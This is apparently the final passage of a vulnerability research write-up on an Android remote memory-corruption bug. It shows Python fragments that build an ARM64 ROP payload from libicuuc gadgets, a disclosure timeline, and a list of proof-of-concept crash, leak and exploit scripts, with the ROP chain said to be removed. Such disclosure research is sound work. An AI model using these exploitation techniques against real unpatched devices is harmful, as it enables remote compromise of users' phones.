This gives us one more degree of freedom, as we can now also utilize gadgets that use x8. So, we will populate our payload buffer with lots of pointers that point into our buffer and are referenced relative to some offset, which gets confusing quickly. Therefore, it is helpful to keep track of already used offsets (accomplished by the set_ptr function as described above) as well as register values. New register values have to be chosen in a way that avoids collisions. This way, we can change the offset of register values within the buffer without too much effort.

# Initial condition
# Signal() ldr x8, [x0], ldr x8, [x8], mov x1, x20; blr x8
# x0 points to our buffer
pc_offset = 0x18 # Arbitrary offset
x0 = payload_base
# Initial **x0 = gadget1
set_ptr( payload_ptr, x0 - payload_base, payload_base + pc_offset)

# Set x8 - Set gadget
g = find_gadget(sys.argv[2],
    "ldr x0, [x0, #8] ; ldr x8, [x0] ; ldr x2, [x8, #0x20] ; br x2")
set_ptr( payload_ptr, pc_offset, g + libicuuc_base)

# Set x8 - Set registers values
x0_new = payload_base + 0x30 # Arbitrary offset
set_ptr( payload_ptr, x0 - payload_base + 0x8, x0_new)
x0 = x0_new
x8 = payload_base + 0x8 # New x8 also arbitrary offset
set_ptr( payload_ptr, x0 - payload_base, x8)
pc_offset = x8 - payload_base + 0x20

Next, we can use a gadget like the following in a similar way to get x19 under control.

ldr x8, [x8, #8] ; mov x19, x0 ; mov x0, x22 ; blr x8

Disclosure and Closing Words

This bug was initially reported to the Android Security Team on November 3, 2019, including a PoC. It was fixed on February 1, 2020, and acknowledged by the Android Security Team. I would like to thank the team for coordinating the process and providing a fix. I would also like to thank Jiska Classen and Fabian Beterke for their assistance. Additionally, we want to give a shout-out to Swing’Blog and Marcin Kozlowski, who were, to our knowledge, the first to reverse-engineer the key idea of the vulnerability.

Scripts for testing can be downloaded here. The ROP chain has been removed from the exploit. The archive contains the following files:

python2 simple_crash.py target: PoC for crashing the remote device
python2 simple_leak.py target: PoC for the section “Unexpected leak”
python2 fancy_leak.py target: PoC for the section “Leaking More Data”
python2 memcpy.py libc.so memcpy: Unicorn emulation of memcpy for section “memwtf(,,-2);”
python2 exploit.py target remote_libicuuc.so: exploit excluding ROP chain

Many thanks also go to Polo35, who provided a PoC working on 32-bit using a different exploit strategy. For further details, check out his repo.